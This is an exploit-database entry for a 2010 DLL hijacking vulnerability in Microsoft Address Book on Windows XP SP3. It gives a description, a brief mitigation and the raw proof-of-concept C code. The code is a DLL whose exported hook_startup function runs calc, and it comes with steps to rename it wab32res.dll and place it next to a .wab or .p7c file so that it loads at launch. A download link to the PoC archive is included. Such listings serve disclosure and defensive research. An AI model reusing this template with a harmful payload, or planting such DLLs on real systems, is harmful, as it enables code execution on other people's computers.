Microsoft Address Book DLL Hijacking

vendor:

Address Book

by:

Beenu Arora

7,2

CVSS

HIGH

DLL Hijacking

427

CWE

Product Name: Address Book

Affected Version From: Microsoft Address Book 6.00.2900.5512

Affected Version To: Microsoft Address Book 6.00.2900.5512

Patch Exists: Yes

Related CWE: N/A

CPE: a:microsoft:address_book

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP SP3

2010

Microsoft Address Book DLL Hijacking

Microsoft Address Book is vulnerable to DLL Hijacking. An attacker can create a malicious DLL file and rename it to wab32res.dll, create a file in the same directory with one of the following extensions: .wab, p7c. When the application is launched, the malicious DLL will be executed.

Mitigation:

Ensure that all applications are up to date and patched with the latest security updates.

Source

Exploit-DB raw data:

/*
# Greetz to :b0nd, Fbih2s,r45c4l,Charles ,j4ckh4x0r, punter,eberly, Charles, Dinesh Arora , Anirban , Dinesh Arora
# Site : www.beenuarora.com

Exploit Title: Microsoft Address Book DLL Hijacking
Date: 25/08/2010
Author: Beenu Arora
Tested on: Windows XP SP3 , Microsoft Address Book 6.00.2900.5512
Vulnerable extensions: wab , p7c

Compile and rename to wab32res.dll, create a file in the same dir with one
of the following extensions:
.wab,p7c
*/

#include <windows.h>
#define DLLIMPORT __declspec (dllexport)

DLLIMPORT void hook_startup() { evil(); }

int evil()
{
  WinExec("calc", 0);
  exit(0);
  return 0;
}

// POC: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/14745.zip